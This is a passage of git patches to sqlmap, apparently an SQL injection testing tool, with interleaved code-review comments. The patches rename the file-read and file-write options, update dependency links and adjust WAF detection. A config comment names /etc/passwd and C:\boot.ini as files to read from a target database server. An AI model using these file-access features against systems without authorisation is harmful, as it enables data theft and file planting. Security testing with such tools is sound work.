plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py 97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py -35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py +b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py 9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 
@@ -164,42 +164,42 @@ bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py -08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py +6cf74341fc84588205e02b70b2f0f5b6 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py -4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py +34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py +85a5d474faaf14df5a5a84c9f232c1d6 plugins/dbms/oracle/fingerprint.py 9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py 5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -d30806e39996e6d273f0af888f5710a4 plugins/dbms/postgresql/fingerprint.py 
+c490b23b19e40e15cfbdbb026386bbd7 plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py 80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py -ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py +9b1f236857b8a64750e8662be21abb69 plugins/dbms/sqlite/fingerprint.py f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py 426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py -c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py +0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py From 2280f3ff2d700092d12fbad12e6f0135cc94a33f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:13:48 +0200 Subject: [PATCH 239/428] Updating old links --- lib/core/settings.py | 2 +- lib/utils/deps.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e7ff864554..2e3d9cb12d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.16" +VERSION = "1.2.8.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/deps.py b/lib/utils/deps.py index e2ea0aa9b5f..937a21c8cce 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -65,7 +65,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "'http://code.google.com/p/impacket/'" + warnMsg += "'https://github.com/coresecurity/impacket'" logger.warn(warnMsg) missing_libraries.add('python-impacket') @@ -76,7 +76,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'" + warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'" logger.warn(warnMsg) missing_libraries.add('python-ntlm') @@ -101,7 +101,7 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" + warnMsg += "'https://pypi.org/project/pyreadline/'" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b45f67f62e5..b6e6815a694 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b5b936aa2f5ea4aa28d66e924ef1dba9 lib/core/settings.py +780178e74a59e86cfd73135528686abd lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -103,7 +103,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py -de9620f03231d8329ee8434884b6bacd lib/utils/deps.py +f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py From f3f4a4cb3794219503f42b48b773d8228e39ff8a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:31:20 +0200 Subject: [PATCH 240/428] Minor refactoring --- lib/controller/action.py | 8 ++++---- lib/core/option.py | 26 +++++++++++++------------- lib/core/optiondict.py | 6 +++--- lib/core/settings.py | 4 ++-- lib/core/target.py | 2 +- lib/parse/cmdline.py | 6 +++--- lib/takeover/udf.py | 2 +- sqlmap.conf | 6 +++--- txt/checksum.md5 | 14 +++++++------- 9 files changed, 37 insertions(+), 37 deletions(-) diff --git a/lib/controller/action.py b/lib/controller/action.py index a05e8f7f4ed..a4de8dffdc3 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py 
@@ -140,11 +140,11 @@ def action(): conf.dbmsHandler.udfInjectCustom() # File system options - if conf.rFile: - conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile)) + if conf.fileRead: + conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead)) - if conf.wFile: - conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType) + if conf.fileWrite: + conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType) # Operating system options if conf.osCmd: diff --git a/lib/core/option.py b/lib/core/option.py index 502a7910117..9e70fb8da9d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -608,22 +608,22 @@ def _(key, value): raise SqlmapFilePathException(errMsg) def _setWriteFile(): - if not conf.wFile: + if not conf.fileWrite: return debugMsg = "setting the write file functionality" logger.debug(debugMsg) - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile + if not os.path.exists(conf.fileWrite): + errMsg = "the provided local file '%s' does not exist" % conf.fileWrite raise SqlmapFilePathException(errMsg) - if not conf.dFile: + if not conf.fileDest: errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile + errMsg += "where you want to write the local file '%s'" % conf.fileWrite raise SqlmapMissingMandatoryOptionException(errMsg) - conf.wFileType = getFileType(conf.wFile) + conf.fileWriteType = getFileType(conf.fileWrite) def _setOS(): """ 
@@ -1509,14 +1509,14 @@ def _cleanupOptions(): if conf.url: conf.url = conf.url.strip() - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) + if conf.fileRead: + conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) + if conf.fileWrite: + conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite)) - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) + if conf.fileDest: + conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest)) if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"): conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl) @@ -1699,7 +1699,7 @@ def _setConfAttributes(): conf.tests = [] conf.trafficFP = None conf.HARCollectorFactory = None - conf.wFileType = None + conf.fileWriteType = None def _setKnowledgeBaseAttributes(flushAll=True): """ diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 10c5b2c8e73..6528e5cf30e 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -165,9 +165,9 @@ }, "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", + "fileRead": "string", + "fileWrite": "string", + "fileDest": "string", }, "Takeover": { diff --git a/lib/core/settings.py b/lib/core/settings.py index 2e3d9cb12d5..22ac274019b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.17" +VERSION = "1.2.8.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -367,7 +367,7 @@ SENSITIVE_DATA_REGEX = r"(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) -SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") +SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred") # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 diff --git a/lib/core/target.py b/lib/core/target.py index 43e153e1e01..4691cec83e9 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -571,7 +571,7 @@ def _createFilesDir(): Create the file directory. """ - if not conf.rFile: + if not conf.fileRead: return conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b255b9da138..24dfa7d6b59 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -471,13 +471,13 @@ def cmdLineParser(argv=None): # File system options filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system") - filesystem.add_option("--file-read", dest="rFile", + filesystem.add_option("--file-read", dest="fileRead", help="Read a file from the back-end DBMS file system") - filesystem.add_option("--file-write", dest="wFile", + filesystem.add_option("--file-write", dest="fileWrite", help="Write a local file on the back-end DBMS file system") - filesystem.add_option("--file-dest", dest="dFile", + filesystem.add_option("--file-dest", dest="fileDest", help="Back-end DBMS absolute filepath to write to") # Takeover options 
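Review bot: The rewritten SENSITIVE_OPTIONS tuple still lists `"authCred"` twice (sixth and last entries), a pre-existing duplicate that this touch-up could drop. Since this list is what masks option values in the anonymous unhandled-exception reports, the rename is only as safe as its coverage: any code path outside the files this commit touches that still sets `conf.rFile`, `conf.wFile` or `conf.dFile` would no longer be matched by the list, so a repository-wide search for the old names is worth doing before merging.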
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index ed0ad2c4167..7e2d46dd2e0 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -108,7 +108,7 @@ def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): return output def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: + if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: self.sysUdfs.pop("sys_fileread") if not conf.osPwn: diff --git a/sqlmap.conf b/sqlmap.conf index 962651c57ff..b81fa51f47b 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -579,15 +579,15 @@ shLib = # Read a specific file from the back-end DBMS underlying file system. # Examples: /etc/passwd or C:\boot.ini -rFile = +fileRead = # Write a local file to a specific path on the back-end DBMS underlying # file system. # Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt -wFile = +fileWrite = # Back-end DBMS absolute filepath to write the file to. -dFile = +fileDest = # These options can be used to access the back-end database management diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b6e6815a694..322cb77972f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py -0f581182871148b0456a691ae85b04c0 lib/controller/action.py +3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 
@@ -40,18 +40,18 @@ ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -05f72baa2db4073bb0273d7fc1df13eb lib/core/optiondict.py -8e759d4c8711a5980d4bdc2d044a4fd4 lib/core/option.py +7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py +6826030069e1cd88eb87603a50b2d251 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -780178e74a59e86cfd73135528686abd lib/core/settings.py +85751568ce17296e01728f4e8041e13b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py +815d1cf27f0f8738d81531e73149867d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -babf5c48bc6a3797fc459706af4465cd lib/parse/cmdline.py +7b2a20d7f149cc2522275e5df23bdc54 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 
@@ -86,7 +86,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py -48575dde7bb867b7937769f569a98309 lib/takeover/udf.py +6a49f359b922df0247eb236126596336 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py From 9e8b28be7c42a7dd65705cfe143a07f70f05f805 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 28 Aug 2018 14:33:48 +0200 Subject: [PATCH 241/428] Minor patch (e.g. case: user's) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 22ac274019b..f9b28952e54 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.18" +VERSION = "1.2.8.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 7dc46b68e76..9c2ae6dbd03 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py 
@@ -182,7 +182,7 @@ def colorize(self, message, levelno): message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) if level != "PAYLOAD": - for match in re.finditer(r"'([^']+)'", message): # single-quoted + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) if not message.endswith(self.reset): reset = self.reset diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 322cb77972f..86ddca52f04 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85751568ce17296e01728f4e8041e13b lib/core/settings.py +cdc31078e93dbf8f213c357f5a6ac00a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -c03de596a9090650c83e8ef722b82833 thirdparty/ansistrm/ansistrm.py +1996d6afa985a526df02efa1bf121976 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From c3d9a1c2d47019754a5e377ba78f091009691b1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 10:56:24 +0200 Subject: [PATCH 242/428] Airlock also uses AL_SESS-S cookie --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/airlock.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) 
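Review bot: The new pattern `[^\w]'([^']+)'` requires a character before the opening quote, so a single-quoted string at the very start of `message` no longer matches, and `match.group(0)` now spans that extra leading character, which matters if the replacement further down uses `group(0)` or `start()` rather than `group(1)` (the hunk only shows `string = match.group(1)`). A zero-width assertion keeps the intent of skipping apostrophes such as "user's" without either side effect: `for match in re.finditer(r"(?<!\w)'([^']+)'", message):  # single-quoted`. The body of colorize continues outside the hunk.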
diff --git a/lib/core/settings.py b/lib/core/settings.py index f9b28952e54..2a716476039 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.19" +VERSION = "1.2.8.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 86ddca52f04..e90087a2c30 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cdc31078e93dbf8f213c357f5a6ac00a lib/core/settings.py +7784e72dc2d0a290d2512f970dc7dc0f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -390,7 +390,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py -667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py +a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py dec64f18c23962d279cc1cde6469afed waf/asm.py diff --git a/waf/airlock.py b/waf/airlock.py index 9dc6078ffc0..6f76073d9a8 100644 --- a/waf/airlock.py +++ b/waf/airlock.py 
@@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: _, headers, _ = get_page(get=vector) - retval = re.search(r"\AAL[_-]?(SESS|LB)=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None + retval = re.search(r"\AAL[_-]?(SESS|LB)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None if retval: break From 0507234add4edf082b81b619149c94eab6114f68 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 29 Aug 2018 11:06:45 +0200 Subject: [PATCH 243/428] Minor update --- lib/controller/checks.py | 5 +++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 074437fce88..4d0bda2e02e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1359,7 +1359,10 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) + pushValue(kb.redirectChoice) pushValue(conf.timeout) + + kb.redirectChoice = REDIRECTION.YES conf.timeout = IDS_WAF_CHECK_TIMEOUT try: @@ -1368,7 +1371,9 @@ def checkWaf(): retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() + kb.redirectChoice = popValue() if retVal: warnMsg = "heuristics detected that the target " diff --git a/lib/core/settings.py b/lib/core/settings.py index 2a716476039..c5a45ea519b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.20" +VERSION = "1.2.8.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
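Review bot: Dropping the `=` from the Set-Cookie pattern turns `\AAL[_-]?(SESS|LB)` into a bare prefix match, so any cookie whose name merely begins with `AL_SESS` or `AL-LB` is now reported as Airlock, while the commit message says the aim is only to also accept `AL_SESS-S`. Spelling that variant out keeps the `=` anchor: `retval = re.search(r"\AAL[_-]?(SESS(-S)?|LB)=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None`. Note that `\A` only inspects the first cookie in the header value, which is pre-existing behaviour and presumably intended. detect's body continues outside the hunk.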
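Review bot: The two checks.py hunks push `kb.redirectChoice` and `conf.timeout` and pop them in the correct LIFO order, but nothing records why the WAF probe now forces `REDIRECTION.YES`, so a reader of the `finally` block in the second hunk cannot tell whether the override is deliberate. I would add above the assignment `# follow redirects unconditionally for this probe so a WAF that answers with a 30x to a block/challenge page is still inspected; restored in the finally block below`. Since the two `pushValue` calls sit before the `try:` while the `popValue` calls sit in `finally`, any exception raised between them would leave the value stack unbalanced; moving the pushes inside the `try` closes that gap, although only plain assignments sit there today. checkWaf's body continues outside both hunks.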
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e90087a2c30..7b6c3efaed0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py +7493c782345a60f6c00c9281d51a494e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7784e72dc2d0a290d2512f970dc7dc0f lib/core/settings.py +8b9c8ae316a1cdf5809b163d7d451ca5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 